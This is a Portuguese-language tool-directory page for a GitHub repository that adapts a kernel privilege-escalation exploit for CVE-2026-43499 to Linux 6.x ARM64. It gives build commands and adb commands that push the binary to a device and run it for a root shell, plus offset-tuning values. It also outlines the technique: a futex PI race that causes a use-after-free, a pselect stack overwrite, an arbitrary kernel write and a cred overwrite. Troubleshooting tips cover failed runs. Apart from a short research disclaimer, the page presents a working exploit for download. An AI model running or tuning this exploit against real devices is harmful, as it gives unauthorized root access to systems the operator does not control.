Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
ghostlock-custom — GhostLock (CVE-2026-43499) adaptação para Linux não-Android 6.x ARM64 | Kitploit
Ferramentas/GitHubGitHub/xiaobailovesstirring/ghostlock-custom
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoExploração de Binários
GitHubxiaobailovesstirring/ghostlock-custom

ghostlock-custom

GhostLock (CVE-2026-43499) adaptação para Linux não-Android 6.x ARM64

Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
3há 21 diasAinda não revisado

GhostLock Custom — Versão adaptada para CVE-2026-43499

Exploração de elevação de privilégios do GhostLock (CVE-2026-43499) para kernels Linux 6.x ARM64 não Android.

Características do kernel

ItemValor
ArquiteturaARM64 (AArch64)
VA_BITS39
KIMAGE_TEXT_BASE0xffffffc008000000
Versão do kernel6.x
SELinuxSem SELinux
ashmemSem ashmem
configfsSem configfs

Compilação

Compilação local (requer compilador cruzado)

root@kitploit:~
make

Compilação com Android NDK

root@kitploit:~
make android-arm64 NDK=/path/to/android-ndk

GitHub Actions (compilação na nuvem)

Após o push, a compilação é acionada automaticamente; basta baixar o artifact.

Uso

root@kitploit:~
# 推送到目标设备
adb push ghostlock-arm64 /data/local/tmp/e
adb shell chmod 755 /data/local/tmp/e

# 获取 root shell
adb shell /data/local/tmp/e --shell

# 调整 pselect 偏移 (如果默认值不工作)
adb shell PSELECT_SHIFT=-4 /data/local/tmp/e --shell
adb shell PSELECT_SHIFT=-2 /data/local/tmp/e --shell
adb shell PSELECT_SHIFT=0 /data/local/tmp/e --shell
adb shell PSELECT_SHIFT=2 /data/local/tmp/e --shell
adb shell PSELECT_SHIFT=4 /data/local/tmp/e --shell

# 指定物理加载地址
adb shell KPHYS=0x80000000 /data/local/tmp/e --shell

Variáveis de ambiente

Princípio da elevação de privilégios

  1. Condição de corrida futex PI: FUTEX_CMP_REQUEUE_PI aciona o UAF em remove_waiter()
  2. Sobrescrita da pilha pselect: o rt_mutex_waiter liberado cai no buffer stack_fds
  3. Escrita na árvore PI: escrita em endereço arbitrário do kernel por meio de um fake waiter construído
  4. Sobrescrita de cred: sobrescreve task_struct->cred com init_cred

Notas de adaptação

Esta versão é uma versão enxuta baseada em ghostlock-oneplus:

  • Remoção do código de desativação do SELinux (este kernel não tem SELinux)
  • Remoção do código relacionado a ashmem/configfs (este kernel não tem esses componentes)
  • Remoção do código de instalação do KernelSU
  • Remoção do vazamento do SLIDE KASLR (sem loggers/nfulnl_logger)
  • Remoção de código específico do Android (miniADB etc.)

Solução de problemas

Aviso legal

Esta ferramenta é apenas para fins de pesquisa em segurança. O usuário é inteiramente responsável por todas as consequências.

Baixar ferramenta
VariávelValor padrãoDescrição
PSELECT_SHIFT-2Ajuste de deslocamento do waiter pselect na pilha
KPHYS0x80000000Endereço de carregamento físico do kernel
KIMAGE_TEXT_BASE0xffffffc008000000Endereço base virtual do kernel
SintomaCausa possívelSolução
O dispositivo reiniciaPSELECT_SHIFT incorretoTente de -4 a +4, um por um
Sem efeitoKPHYS incorretoConfirme o valor correto em /proc/iomem
perf_event_open failedRestrição de seccompTente executar via ADB shell
Sem rootDeslocamento incorretoConfirme a versão do kernel, verifique TASK_CRED_OFF